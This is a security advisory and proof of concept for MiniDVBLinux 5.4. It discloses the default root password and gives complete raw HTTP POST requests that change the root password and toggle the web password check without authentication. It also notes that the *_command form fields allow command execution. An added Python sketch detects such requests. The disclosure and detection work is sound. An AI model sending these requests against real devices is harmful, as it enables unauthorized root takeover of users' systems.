
MiniDVBLinux 5.4 Change Root Password

Date: 17 Oct 2022
Reported by: LiquidWorm, zeroscience.mk
Type: packetstorm
Source: packetstormsecurity.com

MiniDVBLinux 5.4 Change Root Password PoC. A remote attacker can change the root password without authentication. Command execution is also possible via POST parameters. Vendor: MiniDVBLinux

Code
`  
MiniDVBLinux 5.4 Change Root Password PoC  
  
  
Vendor: MiniDVBLinux  
Product web page: https://www.minidvblinux.de  
Affected version: <=5.4  
  
Summary: MiniDVBLinux(TM) Distribution (MLD). MLD offers a simple  
way to convert a standard PC into a Multi Media Centre based on the  
Video Disk Recorder (VDR) by Klaus Schmidinger. Features of this  
Linux based Digital Video Recorder: Watch TV, Timer controlled  
recordings, Time Shift, DVD and MP3 Replay, Setup and configuration  
via browser, and a lot more. MLD strives to be as small as possible,  
modular, simple. It supports numerous hardware platforms, like classic  
desktops in 32/64bit and also various low power ARM systems.  
  
Desc: The application allows a remote attacker to change the root  
password of the system without authentication (disabled by default)  
and without verification of the previously assigned credential. Command  
execution is also possible using several POST parameters.  
  
Tested on: MiniDVBLinux 5.4  
BusyBox v1.25.1  
Architecture: armhf, armhf-rpi2  
GNU/Linux 4.19.127.203 (armv7l)  
VideoDiskRecorder 2.4.6  
  
  
Vulnerability discovered by Gjoko 'LiquidWorm' Krstic  
@zeroscience  
  
  
Advisory ID: ZSL-2022-5715  
Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2022-5715.php  
  
  
24.09.2022  
  
--  
  
  
Default root password: mld500  
  
Change system password:  
-----------------------  
  
POST /?site=setup&section=System HTTP/1.1  
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9  
Accept-Encoding: gzip, deflate  
Accept-Language: en-US,en;q=0.9,mk;q=0.8,sr;q=0.7,hr;q=0.6  
Cache-Control: max-age=0  
Connection: keep-alive  
Content-Length: 778  
Content-Type: application/x-www-form-urlencoded  
Cookie: fadein=true; sessid=fb9b4f16b50c4d3016ef434c760799fc; PHPSESSID=jbqjvk5omsb6pbpas78ll57qnpmvb4st7fk3r7slq80ecrdsubebn31tptjhvfba  
Host: ip:8008  
Origin: http://ip:8008  
Referer: http://ip:8008/?site=setup&section=System  
Upgrade-Insecure-Requests: 1  
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/105.0.0.0 Safari/537.36  
sec-gpc: 1  
  
APT_UPGRADE_CHECK=1&APT_SYSTEM_ID=1&APT_PACKAGE_CLASS_command=%2Fetc%2Fsetup%2Fapt.sh+setclass&APT_PACKAGE_CLASS=stable&SYSTEM_NAME=MiniDVBLinux&SYSTEM_VERSION_command=%2Fetc%2Fsetup%2Fbase.sh+setversion&SYSTEM_VERSION=5.4&SYSTEM_PASSWORD_command=%2Fetc%2Fsetup%2Fbase.sh+setpassword&SYSTEM_PASSWORD=r00t&BUSYBOX_ACPI_command=%2Fetc%2Fsetup%2Fbusybox.sh+setAcpi&BUSYBOX_NTPD_command=%2Fetc%2Fsetup%2Fbusybox.sh+setNtpd&BUSYBOX_NTPD=1&LOG_LEVEL=1&SYSLOG_SIZE_command=%2Fetc%2Fsetup%2Finit.sh+setsyslog&SYSLOG_SIZE=&LANG_command=%2Fetc%2Fsetup%2Flocales.sh+setlang&LANG=en_GB.UTF-8&TIMEZONE_command=%2Fetc%2Fsetup%2Flocales.sh+settimezone&TIMEZONE=Europe%2FKumanovo&KEYMAP_command=%2Fetc%2Fsetup%2Flocales.sh+setkeymap&KEYMAP=de-latin1&action=save&params=&changed=SYSTEM_PASSWORD+  
  
  
Pretty post data:  
  
APT_UPGRADE_CHECK: 1  
APT_SYSTEM_ID: 1  
APT_PACKAGE_CLASS_command: /etc/setup/apt.sh setclass  
APT_PACKAGE_CLASS: stable  
SYSTEM_NAME: MiniDVBLinux  
SYSTEM_VERSION_command: /etc/setup/base.sh setversion  
SYSTEM_VERSION: 5.4  
SYSTEM_PASSWORD_command: /etc/setup/base.sh setpassword  
SYSTEM_PASSWORD: r00t  
BUSYBOX_ACPI_command: /etc/setup/busybox.sh setAcpi  
BUSYBOX_NTPD_command: /etc/setup/busybox.sh setNtpd  
BUSYBOX_NTPD: 1  
LOG_LEVEL: 1  
SYSLOG_SIZE_command: /etc/setup/init.sh setsyslog  
SYSLOG_SIZE:   
LANG_command: /etc/setup/locales.sh setlang  
LANG: en_GB.UTF-8  
TIMEZONE_command: /etc/setup/locales.sh settimezone  
TIMEZONE: Europe/Kumanovo  
KEYMAP_command: /etc/setup/locales.sh setkeymap  
KEYMAP: de-latin1  
action: save  
params:   
changed: SYSTEM_PASSWORD   
  
  
Enable webif password check:  
-----------------------------  
  
POST /?site=setup&section=System HTTP/1.1  
  
APT_UPGRADE_CHECK: 1  
APT_SYSTEM_ID: 1  
APT_PACKAGE_CLASS_command: /etc/setup/apt.sh setclass  
APT_PACKAGE_CLASS: stable  
SYSTEM_NAME: MiniDVBLinux  
SYSTEM_VERSION_command: /etc/setup/base.sh setversion  
SYSTEM_VERSION: 5.4  
SYSTEM_PASSWORD_command: /etc/setup/base.sh setpassword  
SYSTEM_PASSWORD:   
BUSYBOX_ACPI_command: /etc/setup/busybox.sh setAcpi  
BUSYBOX_NTPD_command: /etc/setup/busybox.sh setNtpd  
BUSYBOX_NTPD: 1  
LOG_LEVEL: 1  
SYSLOG_SIZE_command: /etc/setup/init.sh setsyslog  
SYSLOG_SIZE:   
LANG_command: /etc/setup/locales.sh setlang  
LANG: en_GB.UTF-8  
TIMEZONE_command: /etc/setup/locales.sh settimezone  
TIMEZONE: Europe/Berlin  
KEYMAP_command: /etc/setup/locales.sh setkeymap  
KEYMAP: de-latin1  
WEBIF_PASSWORD_CHECK: 1  
action: save  
params:   
changed: WEBIF_PASSWORD_CHECK   
  
  
Disable webif password check:  
-----------------------------  
  
POST /?site=setup&section=System HTTP/1.1  
  
APT_UPGRADE_CHECK: 1  
APT_SYSTEM_ID: 1  
APT_PACKAGE_CLASS_command: /etc/setup/apt.sh setclass  
APT_PACKAGE_CLASS: stable  
SYSTEM_NAME: MiniDVBLinux  
SYSTEM_VERSION_command: /etc/setup/base.sh setversion  
SYSTEM_VERSION: 5.4  
SYSTEM_PASSWORD_command: /etc/setup/base.sh setpassword  
SYSTEM_PASSWORD:   
BUSYBOX_ACPI_command: /etc/setup/busybox.sh setAcpi  
BUSYBOX_NTPD_command: /etc/setup/busybox.sh setNtpd  
BUSYBOX_NTPD: 1  
LOG_LEVEL: 1  
SYSLOG_SIZE_command: /etc/setup/init.sh setsyslog  
SYSLOG_SIZE:   
LANG_command: /etc/setup/locales.sh setlang  
LANG: en_GB.UTF-8  
TIMEZONE_command: /etc/setup/locales.sh settimezone  
TIMEZONE: Europe/Berlin  
KEYMAP_command: /etc/setup/locales.sh setkeymap  
KEYMAP: de-latin1  
action: save  
params:   
changed: WEBIF_PASSWORD_CHECK   
`
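
The requests above show the two things a defender can look for in traffic to `/?site=setup&section=System`: a `changed` field naming `SYSTEM_PASSWORD` or `WEBIF_PASSWORD_CHECK`, and client-supplied `*_command` fields that name the script the device runs. The following detection sketch is an added example, not part of the advisory or of MiniDVBLinux; the function name, the `authenticated` flag (assumed to come from a reverse proxy or log source in front of the device) and the two sample bodies are assumptions constructed for illustration.

```python
from urllib.parse import parse_qs

# *_command values exactly as they appear in the advisory's captured request.
EXPECTED_COMMANDS = {
    "APT_PACKAGE_CLASS_command": "/etc/setup/apt.sh setclass",
    "SYSTEM_VERSION_command": "/etc/setup/base.sh setversion",
    "SYSTEM_PASSWORD_command": "/etc/setup/base.sh setpassword",
    "BUSYBOX_ACPI_command": "/etc/setup/busybox.sh setAcpi",
    "BUSYBOX_NTPD_command": "/etc/setup/busybox.sh setNtpd",
    "SYSLOG_SIZE_command": "/etc/setup/init.sh setsyslog",
    "LANG_command": "/etc/setup/locales.sh setlang",
    "TIMEZONE_command": "/etc/setup/locales.sh settimezone",
    "KEYMAP_command": "/etc/setup/locales.sh setkeymap",
}
# Settings whose change the advisory demonstrates.
SENSITIVE_CHANGES = {"SYSTEM_PASSWORD", "WEBIF_PASSWORD_CHECK"}

# Constructed sample bodies: the first is an excerpt of the advisory's request,
# the second carries a *_command value that differs from the captured one.
SAMPLE_PASSWORD_CHANGE = (
    "SYSTEM_PASSWORD_command=%2Fetc%2Fsetup%2Fbase.sh+setpassword"
    "&SYSTEM_PASSWORD=r00t&action=save&params=&changed=SYSTEM_PASSWORD+"
)
SAMPLE_ALTERED_COMMAND = (
    "LANG_command=%2Fbin%2Ftrue&LANG=en_GB.UTF-8&action=save&params=&changed=LANG"
)


def audit_setup_post(body: str, authenticated: bool) -> list[str]:
    """Return findings for one urlencoded POST body sent to the setup page."""
    # keep_blank_values: the form sends empty fields such as SYSLOG_SIZE=
    fields = {k: v[-1] for k, v in parse_qs(body, keep_blank_values=True).items()}
    findings = []
    if fields.get("action") != "save":
        return findings
    # "changed" is a space-separated list of the settings being written.
    for name in fields.get("changed", "").split():
        if name in SENSITIVE_CHANGES:
            who = "authenticated" if authenticated else "UNAUTHENTICATED"
            findings.append(f"{who} change of {name}")
    # Any *_command that is unknown or differs from the captured value is suspect.
    for name, value in fields.items():
        if name.endswith("_command") and EXPECTED_COMMANDS.get(name) != value:
            findings.append(f"unexpected {name}: {value!r}")
    return findings
```

The allowlist reflects only the commands visible in this advisory's System section request; other setup sections would need their own captured baseline.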
